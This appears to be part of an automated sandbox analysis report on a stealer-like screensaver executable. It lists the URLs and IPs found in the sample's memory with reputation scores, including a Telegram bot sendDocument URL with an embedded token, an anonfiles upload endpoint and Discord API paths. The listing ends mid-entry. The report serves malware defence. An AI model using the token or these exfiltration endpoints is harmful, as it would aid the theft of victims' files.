              https://github.com/python/cpython/issues/86361.0%VirustotalBrowse
              https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy0%Avira URL Cloudsafe
              https://www.python.org/psf/license/0%Avira URL Cloudsafe
              https://www.bbc.co.uk/0%Avira URL Cloudsafe
              https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy0%VirustotalBrowse
              http://ip-api.com/line/?fields=hostingr0%Avira URL Cloudsafe
              https://www.python.org/psf/license/0%VirustotalBrowse
              https://google.com/mail0%Avira URL Cloudsafe
              https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L6880%VirustotalBrowse
              https://www.python.org/psf/license/)0%Avira URL Cloudsafe
              https://www.bbc.co.uk/0%VirustotalBrowse
              https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py0%Avira URL Cloudsafe
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
              https://www.google.com/0%Avira URL Cloudsafe
              https://peps.python.org/pep-0205/0%VirustotalBrowse
              https://www.python.org/psf/license/)0%VirustotalBrowse
              https://www.iqiyi.com/0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              ip-api.com
              208.95.112.1
              truefalseunknown
              api.telegram.org
              149.154.167.220
              truetrueunknown
              NameMaliciousAntivirus DetectionReputation
              https://api.telegram.org/bot6932251862:AAHJgssLa4FQxIPJOSZL101THMOx2PWVwSE/sendDocumentfalse
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://duckduckgo.com/chrome_newtab#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324232079.0000028C87D30000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://github.com/Blank-c/BlankOBF#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2059021822.0000028C87D20000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2058548042.0000028C87CE6000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2058318262.0000028C87E4B000.00000004.00000020.00020000.00000000.sdmpfalse
              • 2%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://www.avito.ru/#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://duckduckgo.com/ac/?q=#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324232079.0000028C87D30000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://api.telegram.org/bot#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmpfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://crl.microsoftpowershell.exe, 00000029.00000002.2198300195.0000015373670000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.ctrip.com/#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py##U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327337197.0000028C872E0000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052434132.0000028C87308000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052638977.0000028C87308000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2051510820.0000028C87308000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052092387.0000028C87308000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://www.leboncoin.fr/#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://tools.ietf.org/html/rfc2388#section-4.4#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327717608.0000028C87630000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327337197.0000028C8737A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2060606390.0000028C87391000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://github.com/urllib3/urllib3/issues/2920px#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330540975.0000028C8800C000.00000004.00001000.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://weibo.com/#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88248000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://api.anonfiles.com/upload#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmpfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://www.msn.com#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88278000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2332092681.0000028C88A42000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://www.microsoftILEEX~1.LNKy./#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2154822441.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.2265902518.0000016191CF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2187351911.0000015310075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2158201728.000001530196F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2187351911.00000153101B8000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://discord.com/api/v9/users/#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328428391.0000028C87830000.00000004.00001000.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330540975.0000028C8800C000.00000004.00001000.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://cacerts.digi#U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040742387.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.microsoftISPLA~1.PNGy.#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330228467.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://peps.python.org/pep-0205/#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2053300423.0000028C876DF000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328428391.0000028C87830000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2057343585.0000028C876DA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2057514542.0000028C876DF000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2053108442.0000028C876DA000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://www.reddit.com/#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.2195052867.0000016181C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2158201728.0000015300001000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.amazon.ca/#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330698605.0000028C88140000.00000004.00001000.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327145319.0000028C8724C000.00000004.00001000.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://www.ebay.co.uk/#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000029.00000002.2158201728.0000015301914000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000007.00000002.2195052867.0000016181EA8000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.ebay.de/#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000029.00000002.2158201728.0000015301914000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://go.micropowershell.exe, 00000029.00000002.2158201728.0000015300C35000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327337197.0000028C872E0000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052434132.0000028C87308000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052638977.0000028C87308000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2051510820.0000028C87308000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052092387.0000028C87308000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://www.amazon.com/#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://github.com/python/cpython/issues/86361.#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327337197.0000028C8737A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2060852882.0000028C877E6000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2061237289.0000028C87680000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://contoso.com/Iconpowershell.exe, 00000029.00000002.2187351911.00000153101B8000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324232079.0000028C87D30000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://httpbin.org/#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2139193812.0000028C877D5000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s#U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.ecosia.org/newtab/#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324232079.0000028C87D30000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.youtube.com/#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://allegro.pl/#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://github.com/Pester/Pesterpowershell.exe, 00000029.00000002.2158201728.0000015301914000.00000004.00000800.00020000.00000000.sdmpfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327784022.0000028C876A3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2325587092.0000028C8768F000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2325587092.0000028C876A3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327784022.0000028C87690000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://www.microsoftRUSTT~2JSOy./#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2162960886.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327337197.0000028C872E0000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052434132.0000028C87308000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052638977.0000028C87308000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2051510820.0000028C87308000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052092387.0000028C87308000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://MD8.mozilla.org/1/m#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88248000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.python.org/psf/license/#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2337720885.00007FF8A8D69000.00000040.00000001.01000000.00000005.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://www.bbc.co.uk/#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://ip-api.com/line/?fields=hostingr#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://bugzilla.mo#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88234000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2329477529.0000028C87C6D000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://tools.ietf.org/html/rfc6125#section-6.4.3#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330698605.0000028C88168000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000007.00000002.2195052867.0000016181EA8000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2111304815.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2123517500.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2143671721.0000028C87C2A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://google.com/mail#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328156314.0000028C877E5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2163201271.0000028C877C9000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2322889946.0000028C877CE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2154159134.0000028C877C5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2130602364.0000028C877D5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2323195620.0000028C877D3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2142394974.0000028C877D5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324867751.0000028C877E1000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2326282443.0000028C877E4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324867751.0000028C877D6000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328156314.0000028C877D9000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2082475372.0000028C877CE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2163456438.0000028C877CE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2139193812.0000028C877D5000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://www.python.org/psf/license/)#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2337720885.00007FF8A8C63000.00000040.00000001.01000000.00000005.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052092387.0000028C87308000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://www.google.com/#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://www.iqiyi.com/#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://foss.heptapod.net/pypy/pypy/-/issues/3539#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330540975.0000028C8800C000.00000004.00001000.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2154822441.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2321848291.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330228467.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2162960886.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://google.com/#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2154822441.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2321848291.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330228467.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2162960886.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmpfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://ocsp.sectigo.com0#U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://tools.ietf.org/html/rfc7231#section-4.3.6)#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327784022.0000028C876A3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2325587092.0000028C876A3000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://www.python.org/download/releases/2.3/mro/.#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327145319.0000028C871D0000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://contoso.com/Licensepowershell.exe, 00000029.00000002.2187351911.00000153101B8000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://discordapp.com/api/v9/users/#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328428391.0000028C87830000.00000004.00001000.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324232079.0000028C87D30000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://github.com/urllib3/urllib3/issues/2920#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87B77000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87B74000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2329026765.0000028C87B86000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2322690660.0000028C87B63000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2154463139.0000028C87B74000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2083926352.0000028C87B75000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330540975.0000028C8800C000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324666281.0000028C87B77000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2326023533.0000028C87B85000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2323296128.0000028C87B76000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0##U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://yahoo.com/#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328156314.0000028C877E5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2163201271.0000028C877C9000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2322889946.0000028C877CE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2154159134.0000028C877C5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2130602364.0000028C877D5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2323195620.0000028C877D3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2142394974.0000028C877D5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324867751.0000028C877E1000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2326282443.0000028C877E4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324867751.0000028C877D6000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328156314.0000028C877D9000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 